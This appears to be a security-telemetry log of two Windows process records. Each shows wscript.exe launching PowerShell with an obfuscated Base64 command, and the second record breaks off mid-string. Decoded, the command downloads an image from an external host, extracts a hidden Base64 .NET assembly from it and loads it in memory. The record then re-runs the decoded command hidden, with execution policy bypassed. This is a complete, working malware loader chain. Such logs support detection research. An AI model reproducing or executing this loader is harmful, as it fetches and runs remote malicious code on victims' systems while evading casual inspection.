parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('kxtWMgO','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
parent_process wscript.exe martian_process powershell -command "$Codigo = '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